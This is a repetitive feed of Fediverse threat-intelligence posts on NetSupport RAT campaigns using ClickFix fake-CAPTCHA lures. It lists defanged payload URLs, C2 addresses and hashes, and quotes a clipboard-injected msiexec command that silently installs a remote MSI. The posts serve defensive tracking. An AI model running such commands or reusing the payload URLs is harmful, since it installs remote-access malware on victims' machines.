#netsupportrat — Public Fediverse posts

ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826

ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826

ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826

2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474

ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474

SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474

SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Recirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt

cc: @monitorsg

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Recirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt

cc: @monitorsg

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Recirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt

cc: @monitorsg

2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.

Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html

2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.

Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html

2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.

Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html

2025-07-15 (Tuesday): Tracking #SmartApeSG

The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site (same as yesterday):

- medthermography[.]com

URLs for ClickFix style fake verification page:

- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9

Running the script for NetSupport RAT:

- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773

#NetSupport RAT server (same as yesterday):

- 185.163.45[.]87:443

2025-07-15 (Tuesday): Tracking #SmartApeSG

The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site (same as yesterday):

- medthermography[.]com

URLs for ClickFix style fake verification page:

- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9

Running the script for NetSupport RAT:

- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773

#NetSupport RAT server (same as yesterday):

- 185.163.45[.]87:443

2025-07-15 (Tuesday): Tracking #SmartApeSG

The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site (same as yesterday):

- medthermography[.]com

URLs for ClickFix style fake verification page:

- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9

Running the script for NetSupport RAT:

- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773

#NetSupport RAT server (same as yesterday):

- 185.163.45[.]87:443

2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site:

- medthermography[.]com

URLs for ClickFix style fake verification page:

- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971

Running the script for NetSupport RAT:

- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526

#NetSupport RAT server:

- 185.163.45[.]87:443

2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site:

- medthermography[.]com

URLs for ClickFix style fake verification page:

- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971

Running the script for NetSupport RAT:

- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526

#NetSupport RAT server:

- 185.163.45[.]87:443

2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site:

- medthermography[.]com

URLs for ClickFix style fake verification page:

- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971

Running the script for NetSupport RAT:

- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526

#NetSupport RAT server:

- 185.163.45[.]87:443

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg

2025-06-18 (Wednesday): #SmartApeSG --> #ClickFix lure --> #NetSupportRAT --> #StealCv2

A #pcap of the traffic, the malware/artifacts, and some IOCs are available at https://www.malware-traffic-analysis.net/2025/06/18/index.html.

Today's the 12th anniversary of my first blog post on malware-traffic-analysis.net, so I made this post a bit more old school.

GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS

GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS

GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS

GrayAlpha Operation Detection: The Fin7-Affiliated Group Spreads PowerNet Loader, NetSupport RAT, and MaskBat Loader – Source: socprime.com https://ciso2ciso.com/grayalpha-operation-detection-the-fin7-affiliated-group-spreads-powernet-loader-netsupport-rat-and-maskbat-loader-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #PowerNetLoader #Latestthreats #MaskBatLoader #NetSupportRAT #socprimecom #GrayAlpha #socprime #Blog #FIN7 #RaaS

2025-03-26 (Wednesday): #SmartApeSG traffic for a fake browser update page leads to a #NetSupport #RAT infection. A zip archive for #StealC sent over the #NetSupportRAT C2 traffic.

The #StealC infection uses DLL side-loading by a legitimate EXE to #sideload the malicious DLL.

A #pcap from an infection, the associated #malware samples, and #IOCs are available at at https://www.malware-traffic-analysis.net/2025/03/26/index.html

2025-03-26 (Wednesday): #SmartApeSG traffic for a fake browser update page leads to a #NetSupport #RAT infection. A zip archive for #StealC sent over the #NetSupportRAT C2 traffic.

The #StealC infection uses DLL side-loading by a legitimate EXE to #sideload the malicious DLL.

A #pcap from an infection, the associated #malware samples, and #IOCs are available at at https://www.malware-traffic-analysis.net/2025/03/26/index.html

2024-12-17 (Tuesday): #SmartApeSG injected script leads to fake browser update page, and that page leads to a #NetSupport #RAT infection.

Just like my last post here, there are 2 injected scripts in a page from the compromised site, one using using depostsolo[.]biz and one using tactlat[.]xyz.

A #pcap of the infection traffic, associated malware samples and more information is available at https://www.malware-traffic-analysis.net/2024/12/17/index.html

NetSupportRAT C2 for this campaign continues to be 194.180.191[.]64 since as early as 2024-11-22.

#FakeUpdates #NetSupportRAT

2024-12-13 (Friday): ww.anceltech[.]com compromised with #SmartApeSG leading to #NetSupport #RAT

Saw 2 injected scripts, one for jitcom[.]info and best-net[.]biz.

Pivoting on best-net[.]biz in URLscan show signs of six other possibly compromised sites: https://urlscan.io/search/#best-net.biz

Those possibly compromised sites are:

- destinationbedfordva[.]com
- exceladept[.]com
- thefilmverdict[.]com
- thenapministry[.]com
- www.estatesale-finder[.]com
- www.freepetchipregistry[.]com

I haven't tried them yet to confirm, but that's always been the case when I pivot on the SmartApeSG domains in URLscan.

#NetSupportRAT C2 for this campaign since as early as 2024-11-22 has been 194.180.191[.]64

2024-12-11 (Wednesday): Zip archive containing #NetSupport #RAT (#NetSupportRAT) package hosted at hxxps[:]//homeservicephiladelphia[.]info/work/yyy.zip

The C2 for this NetSupport package is 194.180.191[.]64, which is a known NetSupport C2 active since 2024-11-22, per ThreatFox: https://threatfox.abuse.ch/ioc/1346763/

Nothing new on the NetSupport side. I'm sure that hosting URL is part of an infection chain, but I don't know what's leading to it.

The Russian cybercrime group FIN7 ran a network of fake AI undressing sites that delivered credential stealing malware to those who uploaded pictures. I gotta say, this is one group of cybercrime victims that I don't feel sorry for.

https://www.silentpush.com/blog/fin7-malware-deepfake-ai-honeypot/

#FIN7 #Russia #Cybercrime #NetSupport #NetSupportRAT #RAT #Malware #CredentialTheft #AI #Deepfake #Deepfakes #DeepNude #DeepNueds #SilentPush